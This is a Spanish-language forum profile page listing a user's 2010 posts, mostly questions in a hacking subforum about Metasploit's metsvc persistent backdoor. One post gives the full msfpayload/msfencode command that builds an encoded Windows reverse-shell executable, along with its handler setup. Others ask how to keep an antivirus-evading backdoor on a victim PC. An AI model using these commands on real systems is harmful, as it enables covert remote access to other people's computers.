Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - darko666

#1
Redes / Re: Duda
15 Mayo 2010, 14:00 PM
Ip privada si, si te instalas una maquina virtual.
ip publica no
#2
Hacking / metsvc
6 Mayo 2010, 19:10 PM
Hola de nuevo.
Por mas que lo intento, no consigo establecer una conexion atraves del payload metsvc_reverse_tcp.

Primero me creo un ejecutable con:
./msfpayload windows/metsvc_reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444  R | msfencode -c 2 -t exe -o /root/my.exe

Segundo pongo el metasploit a la escucha con:
use exploit/multi/handler
set PAYLOAD windows/metsvc_reverse_tcp
set LHOST xx.xx.xx.xx
set LPORT
exploit

luego envio el my.exe a un XP, lo ejecuto y el metasploit ni se inmuta.
A que puede ser devido?
Tengo el metasploit actualizado a la ultima revision



#3
Hacking / Re: Backdoors
30 Abril 2010, 21:13 PM
Me refiero a un backdoor persistente que me de una consola cuando quiera.
Solo conozco el nc pero el antivirus lo detecta. También se puede instalar un backdoor desde el meterpreter pero también lo detecta el antivirus.
Alguna idea?
#4
Hacking / Backdoors
30 Abril 2010, 17:27 PM
Una vez conseguida una consola en un pc víctima, que backdoor seria mejor usar para que sea indetectable por los antivirus??
#5
Hacking / Re: meterpreter run metsvc
9 Abril 2010, 20:13 PM
Lo volveré a repasar. Gracias
#6
Hacking / Re: meterpreter run metsvc
9 Abril 2010, 19:51 PM
Si, y no funciona!
#7
Hacking / Re: meterpreter run metsvc
9 Abril 2010, 13:13 PM
Según he visto en algún tuto tras instalar el metsvc, dejas corriendo en la víctima 2 servicios: metsvc.exe y metsvc-server.exe
por lo que veo en mi laboratorio, tras instalar metsvc solo deja corriendo 1 servicio: metsvc.exe.
a que puede ser debido?
Tengo el metasploit al día y el xp víctima no tiene ni AV ni firewall
#8
Hacking / Re: meterpreter run metsvc
9 Abril 2010, 00:12 AM
Cita de: Alex@ShellRoot en  8 Abril 2010, 23:58 PM
1. Al momento de usar el multi/handler, como lo haces?
use multi/handler
set payload ...
set lport 200
set rhost 192.168.1.35
exploit
#9
Hacking / meterpreter run metsvc
8 Abril 2010, 23:54 PM
Después de conseguir un meterpreter, instalo sin problemas el metsvc en el xp victima.
Luego ejecuto en el metasploit el handler con el payload metsvc_bind_tcp y no consigo conectarme al metsvc.
El metsvc esta corriendo en la víctima porque veo el numero de proceso cuando ejecuto
el comando ps
#10
Buenísima la modificación para que funcione en un spanish!!